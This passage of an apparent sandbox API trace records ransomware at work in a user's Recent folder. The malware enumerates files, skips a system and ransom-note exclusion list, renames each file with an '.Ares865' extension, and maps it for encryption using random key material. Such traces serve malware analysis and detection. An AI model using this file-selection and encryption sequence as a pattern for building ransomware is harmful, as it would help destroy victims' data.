dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.038] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.038] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0093.038] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0093.038] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0093.038] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0093.038] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0093.038] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0093.038] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0093.039] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0093.039] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0093.039] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0093.039] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0093.039] CloseHandle (hObject=0x15c) returned 1 [0093.039] CloseHandle (hObject=0x118) returned 1 [0093.040] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0093.040] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0093.040] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0093.040] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e11d360, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3e11d360, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x3e11d360, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x3d5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4p8QQ.mkv.lnk", cAlternateFileName="4P8QQM~1.LNK")) returned 1 [0093.040] lstrcmpiW (lpString1="4p8QQ.mkv.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0093.040] lstrcmpiW (lpString1="4p8QQ.mkv.lnk", lpString2="aoldtz.exe") returned -1 [0093.040] lstrcmpiW (lpString1="4p8QQ.mkv.lnk", lpString2=".") returned 1 [0093.040] lstrcmpiW (lpString1="4p8QQ.mkv.lnk", lpString2="..") returned 1 [0093.040] lstrcmpiW (lpString1="4p8QQ.mkv.lnk", lpString2="windows") returned -1 [0093.040] lstrcmpiW (lpString1="4p8QQ.mkv.lnk", lpString2="bootmgr") returned -1 [0093.040] lstrcmpiW (lpString1="4p8QQ.mkv.lnk", lpString2="temp") returned -1 [0093.040] lstrcmpiW (lpString1="4p8QQ.mkv.lnk", lpString2="pagefile.sys") returned -1 [0093.040] lstrcmpiW (lpString1="4p8QQ.mkv.lnk", lpString2="boot") returned -1 [0093.040] lstrcmpiW (lpString1="4p8QQ.mkv.lnk", lpString2="ids.txt") returned -1 [0093.040] lstrcmpiW (lpString1="4p8QQ.mkv.lnk", lpString2="ntuser.dat") returned -1 [0093.040] lstrcmpiW (lpString1="4p8QQ.mkv.lnk", lpString2="perflogs") returned -1 [0093.040] lstrcmpiW (lpString1="4p8QQ.mkv.lnk", lpString2="MSBuild") returned -1 [0093.040] lstrlenW (lpString="4p8QQ.mkv.lnk") returned 13 [0093.040] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\4EVHeN.lnk") returned 47 [0093.040] lstrcpyW (in: lpString1=0x2cce44a, lpString2="4p8QQ.mkv.lnk" | out: lpString1="4p8QQ.mkv.lnk") returned="4p8QQ.mkv.lnk" [0093.040] lstrlenW (lpString="4p8QQ.mkv.lnk") returned 13 [0093.041] lstrlenW (lpString="Ares865") returned 7 [0093.041] lstrcmpiW (lpString1="mkv.lnk", lpString2="Ares865") returned 1 [0093.041] lstrlenW (lpString=".dll") returned 4 [0093.041] lstrcmpiW (lpString1="4p8QQ.mkv.lnk", lpString2=".dll") returned 1 [0093.041] lstrlenW (lpString=".lnk") returned 4 [0093.041] lstrcmpiW (lpString1="4p8QQ.mkv.lnk", lpString2=".lnk") returned 1 [0093.041] lstrlenW (lpString=".ini") returned 4 [0093.041] lstrcmpiW (lpString1="4p8QQ.mkv.lnk", lpString2=".ini") returned 1 [0093.041] lstrlenW (lpString=".sys") returned 4 [0093.041] lstrcmpiW (lpString1="4p8QQ.mkv.lnk", lpString2=".sys") returned 1 [0093.041] lstrlenW (lpString="4p8QQ.mkv.lnk") returned 13 [0093.041] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\4p8QQ.mkv.lnk.Ares865") returned 58 [0093.041] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\4p8QQ.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\4p8qq.mkv.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\4p8QQ.mkv.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\4p8qq.mkv.lnk.ares865"), dwFlags=0x1) returned 1 [0093.042] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\4p8QQ.mkv.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\4p8qq.mkv.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.042] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=981) returned 1 [0093.042] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0093.043] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0093.043] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0093.043] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.043] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.043] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.043] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6e0, lpName=0x0) returned 0x15c [0093.044] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6e0) returned 0x190000 [0093.044] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.044] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.044] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.045] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0093.045] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0093.045] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0093.045] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0093.045] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0093.045] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0093.045] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0093.045] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0093.045] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0093.045] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0093.045] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0093.045] CloseHandle (hObject=0x15c) returned 1 [0093.045] CloseHandle (hObject=0x118) returned 1 [0093.046] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0093.046] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0093.046] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0093.046] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3da6b580, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3da6b580, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x3da6b580, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xa04, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="50h53E.lnk", cAlternateFileName="")) returned 1 [0093.046] lstrcmpiW (lpString1="50h53E.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0093.046] lstrcmpiW (lpString1="50h53E.lnk", lpString2="aoldtz.exe") returned -1 [0093.046] lstrcmpiW (lpString1="50h53E.lnk", lpString2=".") returned 1 [0093.047] lstrcmpiW (lpString1="50h53E.lnk", lpString2="..") returned 1 [0093.047] lstrcmpiW (lpString1="50h53E.lnk", lpString2="windows") returned -1 [0093.047] lstrcmpiW (lpString1="50h53E.lnk", lpString2="bootmgr") returned -1 [0093.047] lstrcmpiW (lpString1="50h53E.lnk", lpString2="temp") returned -1 [0093.047] lstrcmpiW (lpString1="50h53E.lnk", lpString2="pagefile.sys") returned -1 [0093.047] lstrcmpiW (lpString1="50h53E.lnk", lpString2="boot") returned -1 [0093.047] lstrcmpiW (lpString1="50h53E.lnk", lpString2="ids.txt") returned -1 [0093.047] lstrcmpiW (lpString1="50h53E.lnk", lpString2="ntuser.dat") returned -1 [0093.047] lstrcmpiW (lpString1="50h53E.lnk", lpString2="perflogs") returned -1 [0093.047] lstrcmpiW (lpString1="50h53E.lnk", lpString2="MSBuild") returned -1 [0093.047] lstrlenW (lpString="50h53E.lnk") returned 10 [0093.047] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\4p8QQ.mkv.lnk") returned 50 [0093.047] lstrcpyW (in: lpString1=0x2cce44a, lpString2="50h53E.lnk" | out: lpString1="50h53E.lnk") returned="50h53E.lnk" [0093.047] lstrlenW (lpString="50h53E.lnk") returned 10 [0093.047] lstrlenW (lpString="Ares865") returned 7 [0093.047] lstrcmpiW (lpString1="53E.lnk", lpString2="Ares865") returned -1 [0093.047] lstrlenW (lpString=".dll") returned 4 [0093.047] lstrcmpiW (lpString1="50h53E.lnk", lpString2=".dll") returned 1 [0093.047] lstrlenW (lpString=".lnk") returned 4 [0093.047] lstrcmpiW (lpString1="50h53E.lnk", lpString2=".lnk") returned 1 [0093.047] lstrlenW (lpString=".ini") returned 4 [0093.047] lstrcmpiW (lpString1="50h53E.lnk", lpString2=".ini") returned 1 [0093.047] lstrlenW (lpString=".sys") returned 4 [0093.047] lstrcmpiW (lpString1="50h53E.lnk", lpString2=".sys") returned 1 [0093.047] lstrlenW (lpString="50h53E.lnk") returned 10 [0093.047] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\50h53E.lnk.Ares865") returned 55 [0093.047] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\50h53E.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\50h53e.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\50h53E.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\50h53e.lnk.ares865"), dwFlags=0x1) returned 1 [0093.048] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\50h53E.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\50h53e.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.049] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2564) returned 1 [0093.049] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0093.049] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0093.049] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0093.049] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.050] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.050] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.050] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd10, lpName=0x0) returned 0x15c [0093.050] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd10) returned 0x190000 [0093.050] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.051] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.051] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.051] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0093.051] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0093.051] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0093.051] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0093.051] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0093.051] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0093.051] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0093.051] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0093.051] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0093.052] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0093.052] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0093.052] CloseHandle (hObject=0x15c) returned 1 [0093.052] CloseHandle (hObject=0x118) returned 1 [0093.053] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0093.053] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0093.053] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0093.053] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3df08020, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3df08020, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x3df08020, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x19f6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5757_10vS5HYp.mkv.lnk", cAlternateFileName="5757_1~1.LNK")) returned 1 [0093.053] lstrcmpiW (lpString1="5757_10vS5HYp.mkv.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0093.053] lstrcmpiW (lpString1="5757_10vS5HYp.mkv.lnk", lpString2="aoldtz.exe") returned -1 [0093.053] lstrcmpiW (lpString1="5757_10vS5HYp.mkv.lnk", lpString2=".") returned 1 [0093.053] lstrcmpiW (lpString1="5757_10vS5HYp.mkv.lnk", lpString2="..") returned 1 [0093.053] lstrcmpiW (lpString1="5757_10vS5HYp.mkv.lnk", lpString2="windows") returned -1 [0093.053] lstrcmpiW (lpString1="5757_10vS5HYp.mkv.lnk", lpString2="bootmgr") returned -1 [0093.053] lstrcmpiW (lpString1="5757_10vS5HYp.mkv.lnk", lpString2="temp") returned -1 [0093.053] lstrcmpiW (lpString1="5757_10vS5HYp.mkv.lnk", lpString2="pagefile.sys") returned -1 [0093.053] lstrcmpiW (lpString1="5757_10vS5HYp.mkv.lnk", lpString2="boot") returned -1 [0093.053] lstrcmpiW (lpString1="5757_10vS5HYp.mkv.lnk", lpString2="ids.txt") returned -1 [0093.053] lstrcmpiW (lpString1="5757_10vS5HYp.mkv.lnk", lpString2="ntuser.dat") returned -1 [0093.053] lstrcmpiW (lpString1="5757_10vS5HYp.mkv.lnk", lpString2="perflogs") returned -1 [0093.053] lstrcmpiW (lpString1="5757_10vS5HYp.mkv.lnk", lpString2="MSBuild") returned -1 [0093.053] lstrlenW (lpString="5757_10vS5HYp.mkv.lnk") returned 21 [0093.053] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\50h53E.lnk") returned 47 [0093.053] lstrcpyW (in: lpString1=0x2cce44a, lpString2="5757_10vS5HYp.mkv.lnk" | out: lpString1="5757_10vS5HYp.mkv.lnk") returned="5757_10vS5HYp.mkv.lnk" [0093.054] lstrlenW (lpString="5757_10vS5HYp.mkv.lnk") returned 21 [0093.054] lstrlenW (lpString="Ares865") returned 7 [0093.054] lstrcmpiW (lpString1="mkv.lnk", lpString2="Ares865") returned 1 [0093.054] lstrlenW (lpString=".dll") returned 4 [0093.054] lstrcmpiW (lpString1="5757_10vS5HYp.mkv.lnk", lpString2=".dll") returned 1 [0093.054] lstrlenW (lpString=".lnk") returned 4 [0093.054] lstrcmpiW (lpString1="5757_10vS5HYp.mkv.lnk", lpString2=".lnk") returned 1 [0093.054] lstrlenW (lpString=".ini") returned 4 [0093.054] lstrcmpiW (lpString1="5757_10vS5HYp.mkv.lnk", lpString2=".ini") returned 1 [0093.054] lstrlenW (lpString=".sys") returned 4 [0093.054] lstrcmpiW (lpString1="5757_10vS5HYp.mkv.lnk", lpString2=".sys") returned 1 [0093.054] lstrlenW (lpString="5757_10vS5HYp.mkv.lnk") returned 21 [0093.054] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\5757_10vS5HYp.mkv.lnk.Ares865") returned 66 [0093.054] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\5757_10vS5HYp.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\5757_10vs5hyp.mkv.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\5757_10vS5HYp.mkv.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\5757_10vs5hyp.mkv.lnk.ares865"), dwFlags=0x1) returned 1 [0093.055] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\5757_10vS5HYp.mkv.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\5757_10vs5hyp.mkv.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.055] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6646) returned 1 [0093.055] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0093.056] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0093.056] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0093.056] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0093.056] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0093.056] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.057] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1d00, lpName=0x0) returned 0x15c [0093.057] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1d00) returned 0x190000 [0093.057] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0093.058] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0093.058] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0093.058] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0093.058] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0093.058] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0093.058] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0093.058] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0093.058] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0093.058] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0093.058] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0093.058] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0093.058] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0093.058] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0093.059] CloseHandle (hObject=0x15c) returned 1 [0093.059] CloseHandle (hObject=0x118) returned 1 [0093.060] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0093.060] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0093.060] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0093.060] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e1434c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3e1434c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x3e1434c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x26b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6E2 vMDzRqNRS7ILqL.lnk", cAlternateFileName="6E2VMD~1.LNK")) returned 1 [0093.060] lstrcmpiW (lpString1="6E2 vMDzRqNRS7ILqL.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0093.060] lstrcmpiW (lpString1="6E2 vMDzRqNRS7ILqL.lnk", lpString2="aoldtz.exe") returned -1 [0093.060] lstrcmpiW (lpString1="6E2 vMDzRqNRS7ILqL.lnk", lpString2=".") returned 1 [0093.060] lstrcmpiW (lpString1="6E2 vMDzRqNRS7ILqL.lnk", lpString2="..") returned 1 [0093.060] lstrcmpiW (lpString1="6E2 vMDzRqNRS7ILqL.lnk", lpString2="windows") returned -1 [0093.060] lstrcmpiW (lpString1="6E2 vMDzRqNRS7ILqL.lnk", lpString2="bootmgr") returned -1 [0093.060] lstrcmpiW (lpString1="6E2 vMDzRqNRS7ILqL.lnk", lpString2="temp") returned -1 [0093.060] lstrcmpiW (lpString1="6E2 vMDzRqNRS7ILqL.lnk", lpString2="pagefile.sys") returned -1 [0093.060] lstrcmpiW (lpString1="6E2 vMDzRqNRS7ILqL.lnk", lpString2="boot") returned -1 [0093.060] lstrcmpiW (lpString1="6E2 vMDzRqNRS7ILqL.lnk", lpString2="ids.txt") returned -1 [0093.060] lstrcmpiW (lpString1="6E2 vMDzRqNRS7ILqL.lnk", lpString2="ntuser.dat") returned -1 [0093.060] lstrcmpiW (lpString1="6E2 vMDzRqNRS7ILqL.lnk", lpString2="perflogs") returned -1 [0093.060] lstrcmpiW (lpString1="6E2 vMDzRqNRS7ILqL.lnk", lpString2="MSBuild") returned -1 [0093.060] lstrlenW (lpString="6E2 vMDzRqNRS7ILqL.lnk") returned 22 [0093.060] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\5757_10vS5HYp.mkv.lnk") returned 58 [0093.060] lstrcpyW (in: lpString1=0x2cce44a, lpString2="6E2 vMDzRqNRS7ILqL.lnk" | out: lpString1="6E2 vMDzRqNRS7ILqL.lnk") returned="6E2 vMDzRqNRS7ILqL.lnk" [0093.060] lstrlenW (lpString="6E2 vMDzRqNRS7ILqL.lnk") returned 22 [0093.060] lstrlenW (lpString="Ares865") returned 7 [0093.060] lstrcmpiW (lpString1="LqL.lnk", lpString2="Ares865") returned 1 [0093.060] lstrlenW (lpString=".dll") returned 4 [0093.060] lstrcmpiW (lpString1="6E2 vMDzRqNRS7ILqL.lnk", lpString2=".dll") returned 1 [0093.060] lstrlenW (lpString=".lnk") returned 4 [0093.061] lstrcmpiW (lpString1="6E2 vMDzRqNRS7ILqL.lnk", lpString2=".lnk") returned 1 [0093.061] lstrlenW (lpString=".ini") returned 4 [0093.061] lstrcmpiW (lpString1="6E2 vMDzRqNRS7ILqL.lnk", lpString2=".ini") returned 1 [0093.061] lstrlenW (lpString=".sys") returned 4 [0093.061] lstrcmpiW (lpString1="6E2 vMDzRqNRS7ILqL.lnk", lpString2=".sys") returned 1 [0093.061] lstrlenW (lpString="6E2 vMDzRqNRS7ILqL.lnk") returned 22 [0093.061] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\6E2 vMDzRqNRS7ILqL.lnk.Ares865") returned 67 [0093.061] MoveFileExW 